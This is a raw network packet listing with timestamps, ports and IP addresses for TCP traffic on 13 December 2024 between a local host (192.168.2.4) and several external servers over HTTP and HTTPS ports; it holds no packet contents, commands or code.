                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.492273092 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.492372990 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.492424965 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.493251085 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.493299961 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.493321896 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.493359089 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.494112015 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.494164944 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.494187117 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.494220972 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.495034933 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.495088100 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.495115995 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.495166063 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.495956898 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.495995045 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.496017933 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.496053934 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.496741056 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.496896982 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.496969938 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.497633934 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.497685909 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.497762918 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.497806072 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.498538971 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.498580933 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.498676062 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.498723984 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.499448061 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.499496937 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.499526978 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.500313044 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.500361919 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.500591040 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.500663042 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.501183033 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.501221895 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.501240969 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.501271009 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.502057076 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.502104044 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.558706999 CET44349795116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.558809996 CET44349795116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.558821917 CET49795443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.558850050 CET49795443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.571899891 CET49795443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.571929932 CET44349795116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.632850885 CET49801443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.632888079 CET44349801116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.633460999 CET49801443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.647814989 CET49801443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:28.647830963 CET44349801116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:29.618357897 CET49802443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:29.618393898 CET44349802116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:29.618689060 CET49802443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:29.618815899 CET49802443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:29.618830919 CET44349802116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:30.050029039 CET44349801116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:30.051187038 CET49801443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:30.052442074 CET49801443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:30.052464962 CET44349801116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:30.054944038 CET49801443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:30.054953098 CET44349801116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:30.055013895 CET49801443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:30.055022001 CET44349801116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:30.983320951 CET4978280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:30.983750105 CET4980880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:31.026294947 CET44349802116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:31.026457071 CET49802443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:31.026899099 CET49802443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:31.026928902 CET44349802116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:31.028661013 CET49802443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:31.028676987 CET44349802116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:31.045924902 CET44349801116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:31.045989990 CET49801443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:31.046025991 CET44349801116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:31.046070099 CET49801443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:31.046072960 CET44349801116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:31.046127081 CET49801443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:31.047053099 CET49801443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:31.047075033 CET44349801116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:31.103630066 CET8049808185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:31.103754044 CET4980880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:31.103764057 CET8049782185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:31.103809118 CET4978280192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:31.104701042 CET4980880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:31.224466085 CET8049808185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:32.064064980 CET44349802116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:32.064126015 CET49802443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:32.064133883 CET44349802116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:32.064174891 CET49802443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:32.075170994 CET49802443192.168.2.4116.203.10.31
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:32.075191021 CET44349802116.203.10.31192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:32.493772984 CET8049808185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:32.495543003 CET4980880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:32.502995968 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:32.503282070 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:32.623380899 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:32.623469114 CET8049789185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:32.623501062 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:32.623672962 CET4978980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:32.634187937 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:32.754817009 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:33.970670938 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:33.970702887 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:33.970716000 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:33.970784903 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:33.970799923 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:33.970805883 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:33.970813990 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:33.970815897 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:33.970865011 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:33.970978975 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:33.970997095 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:33.971009970 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:33.971026897 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:33.971049070 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.090676069 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.090735912 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.090749025 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.090783119 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.162556887 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.162620068 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.162638903 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.162686110 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.165025949 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.165071964 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.165132046 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.165183067 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.173502922 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.173569918 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.173569918 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.173633099 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.183119059 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.183154106 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.183181047 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.183198929 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.190278053 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.190332890 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.190382004 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.190418959 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.198797941 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.198848009 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.198928118 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.207297087 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.207340956 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.207364082 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.207377911 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.215545893 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.215604067 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.215636969 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.215653896 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.223984003 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.224045992 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.224087000 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.224147081 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.232454062 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.232552052 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.232562065 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.232604980 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.240849972 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.240909100 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.240916014 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.241686106 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.282407999 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.282491922 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.355046034 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.355110884 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.355124950 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.355171919 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.357459068 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.357515097 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.357547045 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.357604027 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.362473011 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.362520933 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.362562895 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.362615108 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.367492914 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.367516041 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.367567062 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.372423887 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.372448921 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.372490883 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.377218008 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.377265930 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.377329111 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.377393007 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.382159948 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.382268906 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.382283926 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.382311106 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.386882067 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.386946917 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.386998892 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.391680002 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.391738892 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.391793013 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.392019033 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.396384954 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.396435022 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.396495104 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.396553040 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.401297092 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.401312113 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.401355028 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.401371002 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.406038046 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.406070948 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.406102896 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.406122923 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.411137104 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.411206007 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.411237955 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.411520004 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.415632963 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.415682077 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.415699005 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.416096926 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.419439077 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.419495106 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.419538021 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.419575930 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.423326015 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.423388004 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.423424006 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.423465014 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.427109003 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.427161932 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.427189112 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.428276062 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.430969000 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.431065083 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.431082010 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.431103945 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.434755087 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.434847116 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.434892893 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.438829899 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.438903093 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.438935995 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.439007044 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.475011110 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.475030899 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.475090027 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.475119114 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.547023058 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.547039032 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.547086954 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.547132969 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.547781944 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.547827959 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.547859907 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.548161983 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.550832987 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.550893068 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.550945997 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.551167965 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.554167032 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.554239988 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.554266930 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.554498911 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.557023048 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.557121992 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.557219982 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.557271957 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.560028076 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.560080051 CET4981480192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.560136080 CET8049814185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.560177088 CET4981480192.168.2.4185.215.113.16
